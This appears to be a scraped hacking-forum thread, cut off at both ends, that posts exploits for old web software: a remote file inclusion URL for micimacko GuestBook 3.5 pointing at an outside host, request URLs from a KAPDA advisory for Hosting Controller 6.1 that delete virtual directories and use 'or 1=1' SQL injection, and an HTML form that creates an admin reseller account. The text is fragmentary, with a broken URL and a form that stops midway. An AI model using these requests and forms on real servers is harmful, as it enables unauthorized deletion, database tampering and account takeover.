echo "Exploit failed \r\n"; ?> micimacko(HCE) GuestBook 3.5 Remote Command Execution Xploit: Code: http://www.site.com/[scriptpath]/index.php?GB_PATH=http://con shell black_hat_cr(HCE) Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln. Trích: Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln. SQL_Injection, Command Injection [KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2 Vendor: Hosting Controller Vendor URL: www.hostingcontroller.com Solution: Hotfix 3.3 Found Date: 7/1/2006 Release Date: 10/10/2006 Discussion: UnAuthenticated user can 1- delete every sites virtual directory on hc sites 2- make forum virtual directory (with the desire name) for everysites on hc! 3- disable all hc forums by SQL Injection 4- enable all hc forums by SQL Injection Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory. Exploit: (or POC) 1- unAuthenticated user can delete every sites virtual directory on hc sites by forum! /forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=tes tsite.com&VDirName=test&ForumID=1 2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum! /forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=tests ite.com&VDirName=test&ForumID= 3- unAuthenticated user can disable all hc forums by SQL_Injection /forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1 4- unAuthenticated user can enable all hc forums by SQL_Injection /forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1 Credit : Soroush Dalili of Kapda and GSG IRSDL [4t} kapda <d0t] ir Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir] GSG - Grayhatz security group [http://www.Grayhatz.net] By Pi3cH On 16 Oct 2006 Navaro(HCE) Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability Title: An attacker can gain reseller privileges and after that can gain admin privileges Version: 6.1 Hotfix <= 3.1 Developer url: www.Hostingcontroller.com Solution: Update to Hotfix 3.2 Discover date: 2005,Summer Report date (to hc company): Sat Jun 10, 2006 Publish date (in security forums): Thu July 06, 2006 =============================================== 1- This code give resadmin session to a user: Bug in "hosting/addreseller.asp", No checker is available. <script> function siteaction(){ n_act= "/hosting/addreseller.asp?htype=3" window.document.all.frm1.action = window.document.all.siteact.value + n_act window.document.all.frm1.submit() } </script> <hr><br> Form1<br> URL: <input type="text" name=siteact size=70> <br> <form name="frm1" method="post" onsubmit="return siteaction()"> <table> <tr> <td>reseller</td> <td><input type="text" name="reseller" value="hcadmin"></td> </tr> <tr> <td>loginname</td> <td><input type="text" name="loginname" value="hcadmin"></td> </tr> <tr> <td>Password</td> <td><input type="text" name="Password" value=""></td> </tr> <tr> <td>first_name</td> <td><input type="text" name="first_name" value=""></td> </tr> <tr> <td>first_name</td> <td><input type="text" name="first_name" value=""></td> </tr> <tr> <td>last_name</td> <td><input type="text" name="last_name" value=""></td> </tr> <tr> <td>address</td> <td><input type="text" name="address" value=""></td> </tr> <tr> <td>city</td> <td><input type="text" name="city" value=""></td> </tr> <tr> <td>state</td> <td><input type="text" name="state" value=""></td> </tr> <tr> <td>country</td> <td><input type="text" name="country" value=""></td> </tr> <tr> <td>email</td> <td><input type="text" name="email" value=""></td> </tr> <tr> <td>phone</td> <td><input type="text" name="phone" value=""></td> </tr> <tr> <td>fax</td> <td><input type="text" name="fax" value=""></td> </tr> <tr> <td>zip</td> <td><input type="text" name="zip" value=""></td> </tr> <tr> <td>selMonth</td> <td><input type="text" name="selMonth" value=""></td> </tr> <tr> <td>selYear</td> <td><input type="text" name="selYear" value=""></td> </tr> <tr>